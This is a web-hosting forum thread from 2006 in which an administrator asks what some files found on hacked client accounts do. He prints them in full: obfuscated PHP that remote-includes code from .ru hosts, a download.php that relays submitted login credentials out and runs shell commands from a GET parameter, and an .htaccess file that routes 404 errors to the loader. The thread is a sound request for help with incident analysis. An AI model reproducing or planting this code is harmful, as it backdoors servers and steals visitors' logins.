Create.PHP, Base.PHP and .htaccess

**blakeblake** · 01-11-2006 06:06 PM

Hi Guys, Gals And Guys Who Are Sometimes Gals..

A few clients had been hacked as of recently on one particular server that we I have. At first I figured it was just random attacks as the type of programs that were hacked were all different. Until I noticed that each of these hacked accounts had the few same files that were put there in on the same date and had the same ownership/permissions. The files were create.php , download.php, base.php and then a .htaccess file created to reference them. The files were all set to full 777 permissions and they were owned by nobody.

Below is the content from all the files

base.php or create.php content are the same:

Code:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

.htaccess contents

Code:

Options -MultiViews
ErrorDocument 404 //projects/Calendar/includes/create.php

download.php contents

Code:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Has anybody else noticed these types of files as of yet, and if not could anybody possibly inform me what these files are really trying to do as I am obviously not quite sure.

Thanks as always
Mark

**neutro** · 06-26-2006 10:24 AM

This script got injected due to wrong permission to folders 777 . I am also having this problem.

LinkBack

Thread Tools

Create.PHP, Base.PHP and .htaccess

Please help - PHP values htaccess/php.ini

Crear base de datos desde php

php open base dir question

can i use php in /usr/local/cpanel/base/unprotected [login page]

[line 108 of /usr/local/cpanel/base/horde/lib/Prefs/sql.php]